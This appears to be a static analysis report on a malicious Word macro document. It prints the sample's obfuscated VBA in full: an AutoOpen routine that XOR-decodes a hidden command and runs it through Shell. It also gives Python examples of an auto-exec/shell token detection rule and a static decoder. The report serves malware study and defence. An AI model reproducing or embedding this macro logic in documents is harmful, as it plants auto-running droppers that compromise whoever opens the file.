Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e76c4dfc3be86c0c…

MALICIOUS

Office (OOXML)

Size: 62.7 KB
Created: 2020-06-22 23:03:00 UTC
Authoring application: Microsoft Office Word 14.0000 (Word 2010)
First seen: 2020-10-03
MD5: b7f3c25788e58d1b00165de2ac089095
SHA-1: 0cc882981d51359f6894f48ac29d264d0ae80ec2
SHA-256: e76c4dfc3be86c0c4ac46a50406c53ea3f72a224ae265182302147a9d9e0a655
Risk score: 192

Heuristics 7

  • ClamAV: Doc.Dropper.Generic-9823774-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Generic-9823774-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (lgqHqFmylET)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Note: every entry below is an OOXML / WordprocessingML XML namespace URI (an xmlns declaration in the document's XML parts), of the kind found in ordinary Word-generated .docx files. None of them is a network indicator for this sample; the execution path here is the VBA macro's Shell call, not any of these URLs.
    URL | Channel
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape | In document text (OOXML body / shared strings)
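The pairing rule described under OLE_VBA_PCODE_AUTOEXEC_EXEC, written out as an added example (it is not the scanner's own code). It applies the stated rule to any text dump of a stream, using exactly the token lists named in the heuristic description, and reports which tokens matched on which line. The firing sample is built from lines of macros.bas in this report; the control stream, which has an entry point but no execution token, is constructed to show that one class alone does not fire.

```python
"""Token-pair check modelled on OLE_VBA_PCODE_AUTOEXEC_EXEC above.
Added example, not the scanner's code: it applies the stated rule (an auto-exec
entry point AND an execution/download token in the same stream) to a text dump of
a stream and reports which tokens matched on which line. Token lists are the ones
named in the heuristic description; the two sample streams are constructed.
"""
import re

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _find(tokens, text):
    """[(token, line_no)] for every whole-identifier, case-insensitive hit.
    Lookarounds rather than a plain word boundary, so dotted tokens such as
    'cmd.exe' and 'ADODB.Stream' work and 'Shell' does not fire inside a longer
    identifier such as 'NoShellHere'."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for tok in tokens:
            pat = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
            if re.search(pat, line, re.IGNORECASE):
                hits.append((tok, no))
    return hits


def autoexec_exec_pair(stream_text):
    """The rule fires only when BOTH classes are present. Either class alone is
    still reported, but 'fires' stays False (an AutoOpen-only template is quiet)."""
    auto = _find(AUTOEXEC_TOKENS, stream_text)
    execs = _find(EXEC_TOKENS, stream_text)
    return {"fires": bool(auto) and bool(execs), "autoexec": auto, "exec": execs}


# Firing case: lines taken from macros.bas in this report.
SAMPLE_STREAM = """Sub imCupfmytbCX()
Dim lgqHqFmylET As String
Shell (lgqHqFmylET)
End Sub
Sub AutoOpen()
imCupfmytbCX
End Sub
"""

# Constructed control: an entry point with no execution token must not fire.
CONTROL_STREAM = """Sub AutoOpen()
ActiveDocument.Save
End Sub
"""
```

On decoded source text a comment or string literal that merely contains "Shell" would also count, which is the price of a purely lexical rule; on a p-code or cache stream the tokens are the compiled identifiers, so that noise does not arise, which is why the report applies the rule there when the visible source is unavailable.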

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7339 bytes
SHA-256: 7f44d9b45925f63deb4ce669d7f0fbd3133bf54d1d34fc6aefa70f6082cfae15
Detection
ClamAV: No threats found
Obfuscation or payload: likely
33 of 62 identifiers look randomly generated (e.g. 'GJZkbnwPUIxHqZUf') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Private NsJXnantEx       As Boolean
Private MiIuYJIQVapLJw(((0 Xor 0) + 0) To (43 Xor 20)) As Byte
Private jDVRwwwkYZlS(((0 Xor 0) + (0 Xor 0)) To 127) As Byte
Sub imCupfmytbCX()
Dim lgqHqFmylET As String
Dim LfYNuIozFM As String
lgqHqFmylET = PkMtkugIzAdJ(Array(141, (12 Xor 67), 237, (40 + (9 Xor 17)), ((2 Xor 75) + 6), (124 + 41), (5 Xor 152), (9 Xor 83), (123 + (67 Xor 15)), ((48 Xor 124) + (14 Xor 168)), (157 Xor 52), (124 + (19 Xor 36)), (29 + 82), (36 + (95 Xor 54)), 91, (165 + (37 Xor 111)), (54 + 77), 85, (5 + 49), ((5 Xor 13) + 93), ((3 Xor 69) + (14 Xor 38)), ((60 Xor 73) + 59), (4 + 55)), (0 Xor 0)) & PkMtkugIzAdJ(Array((16 Xor 5), (3 Xor 87), ((0 Xor 126) + (92 Xor 45)), (7 Xor 236), (5 Xor 23), (122 Xor 211), 149, (8 Xor 143), (81 + 71), 125, 194, (96 Xor 217), _
((0 Xor 2) + 10), 136, ((41 Xor 68) + (16 Xor 104)), 87, 95, ((3 Xor 16) + (16 Xor 3)), (23 Xor 92), (26 Xor 208), (24 + 205), ((6 Xor 118) + (111 Xor 231)), (20 + (197 Xor 12)), ((52 Xor 126) + 146), (5 + 8), 44, (58 Xor 168), ((4 Xor 32) + 62), ((23 Xor 85) + 78), (31 Xor 178), 15, (159 Xor 101), (50 Xor 79), ((62 Xor 165) + 91), ((104 Xor 194) + (16 Xor 42)), (115 + 14), (9 + 14), (78 Xor 195), (62 + 10), (167 + (1 Xor 6)), ((81 Xor 52) + (71 Xor 22)), (41 + 27), (136 + (10 Xor 56)), (3 Xor 36), ((13 Xor 80) + (24 Xor 85)), 9, (90 + (6 Xor 11)), 45, ((0 Xor 1) + 99), _
(22 + 48), 122, (75 Xor 7), (17 + (102 Xor 246)), 233, ((11 Xor 72) + 32), 243, (6 + 2), 64, ((15 Xor 21) + (113 Xor 164)), (93 Xor 188), (135 + 81), (22 + (94 Xor 47)), (11 Xor 21), 80, 35, 128, 125, ((9 Xor 2) + (0 Xor 0)), (7 + 126), ((96 Xor 200) + 45), ((15 Xor 0) + 41), ((44 Xor 16) + 32), (48 + 47), (2 + (0 Xor 2)), 236, 52, ((16 Xor 10) + 3), (19 + (49 Xor 169)), (179 Xor 121), ((0 Xor 12) + (5 Xor 9)), (118 + 4), (112 + (32 Xor 14)), (44 + 123), ((17 Xor 58) + 0), (63 + 26), (32 Xor 165), ((39 Xor 17) + (40 Xor 178)), 253, ((15 Xor 51) + 137), (15 + 228), 124, (49 Xor 151), _
((15 Xor 168) + 5), (34 Xor 21), ((3 Xor 42) + 188), (28 + (3 Xor 6)), (4 Xor 15), ((39 Xor 8) + 14), ((7 Xor 15) + 12), (6 + 89), 33, (55 + (24 Xor 60)), ((71 Xor 246) + 24)), (5 + (4 Xor 22)))
Shell (lgqHqFmylET)
End Sub
Sub AutoOpen()
imCupfmytbCX
End Sub
Public Function VpnzjhRwEdOFSN(ByVal InqFgVqihcg As String) As Byte()
If Not NsJXnantEx Then NdXoNLPkgULAY
Dim BmgDhMLZFURPM() As Byte: BmgDhMLZFURPM = bwYiGGvrmu(InqFgVqihcg)
Dim cdAuOBJmHZeY As Long: cdAuOBJmHZeY = UBound(BmgDhMLZFURPM) + ((1 Xor 0) + 0)
If cdAuOBJmHZeY Mod 4 <> 0 Then Err.Raise vbObjectError, , ""
Do While cdAuOBJmHZeY > ((0 Xor 0) + 0)
If BmgDhMLZFURPM(cdAuOBJmHZeY - 1) <> Asc("=") Then Exit Do
cdAuOBJmHZeY = cdAuOBJmHZeY - (1 Xor 0)
Loop
Dim iHpWxhllQO As Long: iHpWxhllQO = (cdAuOBJmHZeY * 3) \ 4
Dim CaikzdTzmqMb() As Byte
ReDim CaikzdTzmqMb((0 Xor 0) To iHpWxhllQO - (0 + (1 Xor 0))) As Byte
Dim tHRkGlEQVYkCg As Long
Dim ySroOGPRdQRrKB As Long
Do While tHRkGlEQVYkCg < cdAuOBJmHZeY
Dim ZjnycKWwPqZbNs As Byte: ZjnycKWwPqZbNs = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + 1
Dim nKKESTawciAOZE As Byte: nKKESTawciAOZE = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + ((0 Xor 0) + (0 Xor 1))
Dim gvHcQmjepyK As Byte: If tHRkGlEQVYkCg < cdAuOBJmHZeY Then gvHcQmjepyK = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + 1 Else gvHcQmjepyK = Asc("A")
Dim DhmhqscRjTKy As Byte: If tHRkGlEQVYkCg < cdAuOBJmHZeY Then DhmhqscRjTKy = BmgDhMLZFURPM(tHRkGlEQVYkCg): tHRkGlEQVYkCg = tHRkGlEQVYkCg + (1 + 0) Else DhmhqscRjTKy = Asc("A")
If ZjnycKWwPqZbNs > (82 + (31 Xor 50)) Or nKKESTawciAOZE > (120 + 7) Or gvHcQmjepyK > (21 Xor 106) Or DhmhqscRjTKy > (38 + (4 Xor 93)) Then _
Err.Raise vbObjectError, , ""
Dim ClHWavdNYJDOQ As Byte: ClHWavdNYJDOQ = jDVRwwwkYZlS(ZjnycKWwPqZbNs)
Dim HokzAIswlBfbJU As Byte: HokzAIswlBfbJU = jDVRwwwkYZlS(nKKESTawciAOZE)
Dim CYfgMmYoXjSbS As Byte: CYfgMmYoXjSbS = jDVRwwwkYZlS(gvHcQmjepyK)
Dim CHcSiiduLMAMf As Byte: CHcSiiduLMAMf = jDVRwwwkYZlS(DhmhqscRjTKy)
If ClHWavdNYJDOQ > 63 Or HokzAIswlBfbJU > (38 + 25) Or CYfgMmYoXjSbS > (1 + (1 Xor 63)) Or CHcSiiduLMAMf > 63 Then _
Err.Raise vbObjectError, , ""
Dim dwcJjJhDhrYS As Byte: dwcJjJhDhrYS = (ClHWavdNYJDOQ * (2 + 2)) Or (HokzAIswlBfbJU \ &H10)
Dim UHBdzJnMdl As Byte: UHBdzJnMdl = ((HokzAIswlBfbJU And &HF) * &H10) Or (CYfgMmYoXjSbS \ 4)
Dim rPDVdrsZvxdHK As Byte: rPDVdrsZvxdHK = ((CYfgMmYoXjSbS And (1 Xor 2)) * &H40) Or CHcSiiduLMAMf
CaikzdTzmqMb(ySroOGPRdQRrKB) = dwcJjJhDhrYS: ySroOGPRdQRrKB = ySroOGPRdQRrKB + 1
If ySroOGPRdQRrKB < iHpWxhllQO Then CaikzdTzmqMb(ySroOGPRdQRrKB) = UHBdzJnMdl: ySroOGPRdQRrKB = ySroOGPRdQRrKB + ((1 Xor 0) + (0 Xor 0))
If ySroOGPRdQRrKB < iHpWxhllQO Then CaikzdTzmqMb(ySroOGPRdQRrKB) = rPDVdrsZvxdHK: ySroOGPRdQRrKB = ySroOGPRdQRrKB + 1
Loop
VpnzjhRwEdOFSN = CaikzdTzmqMb
End Function
Private Sub NdXoNLPkgULAY()
Dim MYIGYuLYTgjD As Integer, IMMsEwrpiAy As Integer
IMMsEwrpiAy = ((0 Xor 0) + (0 Xor 0))
For MYIGYuLYTgjD = Asc("A") To Asc("Z"): MiIuYJIQVapLJw(IMMsEwrpiAy) = MYIGYuLYTgjD: IMMsEwrpiAy = IMMsEwrpiAy + (0 Xor 1): Next
For MYIGYuLYTgjD = Asc("a") To Asc("z"): MiIuYJIQVapLJw(IMMsEwrpiAy) = MYIGYuLYTgjD: IMMsEwrpiAy = IMMsEwrpiAy + (1 Xor 0): Next
For MYIGYuLYTgjD = Asc("0") To Asc("9"): MiIuYJIQVapLJw(IMMsEwrpiAy) = MYIGYuLYTgjD: IMMsEwrpiAy = IMMsEwrpiAy + 1: Next
MiIuYJIQVapLJw(IMMsEwrpiAy) = Asc("+"): IMMsEwrpiAy = IMMsEwrpiAy + (0 + (1 Xor 0))
MiIuYJIQVapLJw(IMMsEwrpiAy) = Asc("/"): IMMsEwrpiAy = IMMsEwrpiAy + 1
For IMMsEwrpiAy = ((0 Xor 0) + (0 Xor 0)) To (102 + (5 Xor 28)): jDVRwwwkYZlS(IMMsEwrpiAy) = (132 Xor 123): Next
For IMMsEwrpiAy = (0 Xor 0) To (34 + 29): jDVRwwwkYZlS(MiIuYJIQVapLJw(IMMsEwrpiAy)) = IMMsEwrpiAy: Next
NsJXnantEx = True
End Sub
Private Function bwYiGGvrmu(ByVal InqFgVqihcg As String) As Byte()
Dim HokzAIswlBfbJU() As Byte: HokzAIswlBfbJU = InqFgVqihcg
Dim EjzesyJnGBmVMf As Long: EjzesyJnGBmVMf = (UBound(HokzAIswlBfbJU) + (1 Xor 0)) \ (1 Xor 3)
If EjzesyJnGBmVMf = 0 Then bwYiGGvrmu = HokzAIswlBfbJU: Exit Function
Dim CYfgMmYoXjSbS() As Byte
ReDim CYfgMmYoXjSbS((0 + (0 Xor 0)) To EjzesyJnGBmVMf - (0 + (1 Xor 0))) As Byte
Dim dsEYCpjjovr As Long
For dsEYCpjjovr = (0 Xor 0) To EjzesyJnGBmVMf - ((0 Xor 0) + (1 Xor 0))
Dim MYIGYuLYTgjD As Long: MYIGYuLYTgjD = HokzAIswlBfbJU((1 + (1 Xor 0)) * dsEYCpjjovr) + 256 * CLng(HokzAIswlBfbJU((0 Xor 2) * dsEYCpjjovr + (0 + 1)))
If MYIGYuLYTgjD >= ((160 Xor 94) + 2) Then MYIGYuLYTgjD = Asc("?")
CYfgMmYoXjSbS(dsEYCpjjovr) = MYIGYuLYTgjD
Next
bwYiGGvrmu = CYfgMmYoXjSbS
End Function
Private Function PkMtkugIzAdJ(GqPnJsNaZKmtnL As Variant, fjDGiowAFD As Integer)
Dim YNGmAASUAKX As String
Dim ZlsSnYheFBSOT() As Byte
ZlsSnYheFBSOT = VpnzjhRwEdOFSN(ActiveDocument.Variables("GJZkbnwPUIxHqZUf"))
YNGmAASUAKX = ""
For IMMsEwrpiAy = LBound(GqPnJsNaZKmtnL) To UBound(GqPnJsNaZKmtnL)
YNGmAASUAKX = YNGmAASUAKX & Chr(ZlsSnYheFBSOT(IMMsEwrpiAy + fjDGiowAFD) Xor GqPnJsNaZKmtnL(IMMsEwrpiAy))
Next
PkMtkugIzAdJ = YNGmAASUAKX
End Function
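What the listing above actually does, as an added static decoder (not code from the report or from the sample): PkMtkugIzAdJ XORs each arithmetic-obfuscated byte array against a key that VpnzjhRwEdOFSN base64-decodes from the Word document variable GJZkbnwPUIxHqZUf, and the result goes straight to Shell. Document variables are stored as <w:docVar> elements in word/settings.xml inside the .docx ZIP, which is where a static pipeline reads them. The value of that variable is not on this page, so the key, the settings.xml fragment and the short macro snippet below are constructed; the first real PkMtkugIzAdJ call is copied verbatim so the constant folding runs on the sample's own data.

```python
"""Static decoder for the string obfuscation in macros.bas above.
Added example, not code from the report or the sample: it folds the arithmetic-
obfuscated byte arrays, base64-decodes the key that PkMtkugIzAdJ reads from the
Word document variable GJZkbnwPUIxHqZUf (a <w:docVar> in word/settings.xml) and
XORs each array against the key at the call's offset. The variable's value is not
on the page, so the key, settings.xml and short macro snippet here are constructed.
"""
import ast
import base64
import re
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def fold_vba_int(expr):
    """'(40 + (9 Xor 17))' -> 64. Only int literals, '+', 'Xor', parentheses; no eval()."""
    tree = ast.parse(re.sub(r"\bXor\b", "^", expr, flags=re.IGNORECASE), mode="eval")

    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.BitXor)):
            l, r = ev(node.left), ev(node.right)
            return l + r if isinstance(node.op, ast.Add) else l ^ r
        raise ValueError(f"unsupported construct in {expr!r}")
    return ev(tree)


def _past_matching_paren(src, open_idx):
    """Index just after the ')' matching the '(' at src[open_idx]."""
    depth = 0
    for i in range(open_idx, len(src)):
        depth += (src[i] == "(") - (src[i] == ")")
        if depth == 0:
            return i + 1
    raise ValueError("unbalanced parentheses")


def _split_top_level(s):
    """Split on commas not nested inside parentheses."""
    parts, cur, depth = [], [], 0
    for ch in s:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    return parts + ["".join(cur).strip()]


def parse_calls(vba_src, func="PkMtkugIzAdJ"):
    """[(cipher_bytes, key_offset)] for every func(Array(...), offset) call."""
    src = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", vba_src)  # join VBA ' _' continuations
    marker, calls, pos = func + "(Array(", [], 0
    while (i := src.find(marker, pos)) >= 0:
        arr_open = i + len(marker) - 1
        arr_end = _past_matching_paren(src, arr_open)
        call_end = _past_matching_paren(src, i + len(func))
        cipher = [fold_vba_int(e) for e in _split_top_level(src[arr_open + 1:arr_end - 1])]
        offset = fold_vba_int(src[arr_end:call_end - 1].strip(" ,"))
        calls.append((cipher, offset))
        pos = call_end
    return calls


def key_from_settings_xml(settings_xml, var_name):
    """Base64-decode <w:docVar w:name=var_name w:val=...>; VpnzjhRwEdOFSN does the
    same with ActiveDocument.Variables(var_name) through its own lookup table."""
    for dv in ET.fromstring(settings_xml).iter(f"{{{W_NS}}}docVar"):
        if dv.get(f"{{{W_NS}}}name") == var_name:
            return base64.b64decode(dv.get(f"{{{W_NS}}}val"))
    raise KeyError(var_name)


def recover_strings(vba_src, key):
    """Chr(key[i + offset] Xor cipher[i]) per element: one plaintext per call."""
    return ["".join(chr(key[i + off] ^ c) for i, c in enumerate(cipher))
            for cipher, off in parse_calls(vba_src)]


# First call copied verbatim from macros.bas (its key is unknown, so only folding is shown).
# It has 23 elements and the second call's offset (5 + (4 Xor 22)) folds to 23: both calls
# consume one contiguous key stream, so decoding both with one key yields one command line.
REAL_FIRST_CALL = (
    "lgqHqFmylET = PkMtkugIzAdJ(Array(141, (12 Xor 67), 237, (40 + (9 Xor 17)), "
    "((2 Xor 75) + 6), (124 + 41), (5 Xor 152), (9 Xor 83), (123 + (67 Xor 15)), "
    "((48 Xor 124) + (14 Xor 168)), (157 Xor 52), (124 + (19 Xor 36)), (29 + 82), "
    "(36 + (95 Xor 54)), 91, (165 + (37 Xor 111)), (54 + 77), 85, (5 + 49), "
    "((5 Xor 13) + 93), ((3 Xor 69) + (14 Xor 38)), ((60 Xor 73) + 59), (4 + 55)), (0 Xor 0))"
)

# Constructed key (bytes 10 20 30 40 50 60 70 80 hex), docVar and snippet: NOT from the sample.
SAMPLE_SETTINGS_XML = ('<w:settings xmlns:w="' + W_NS + '"><w:docVars><w:docVar '
                       'w:name="GJZkbnwPUIxHqZUf" w:val="ECAwQFBgcIA="/></w:docVars></w:settings>')
SAMPLE_MACRO = """lgqHqFmylET = PkMtkugIzAdJ(Array((100 + 15), (1 Xor 64), ((8 Xor 4) + 80)), (0 Xor 0)) & PkMtkugIzAdJ(Array(35, (127 Xor 1), (5 Xor 0), _
((0 Xor 0) + 8), (200 + 29)), (1 + 2))
Shell (lgqHqFmylET)
"""
```

Against a real sample the inputs are the olevba output for `vba_src` and the `word/settings.xml` entry pulled out of the .docx ZIP for `settings_xml`; `"".join(recover_strings(vba_src, key))` then gives the string that reaches Shell without ever running the macro. The expression folder deliberately rejects anything but integer literals, `+` and `Xor`, so a crafted array element cannot turn the analyst's decoder into a code-execution sink.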
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 28672 bytes
SHA-256: 04016854dfe79ee7a5240098057f7bdd9412e241b3bbe2713eac07a0b2b1e7aa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
140 of 231 identifiers look randomly generated (e.g. 'tZtzDSgkXEUBHg9v') — consistent with name-mangling obfuscation.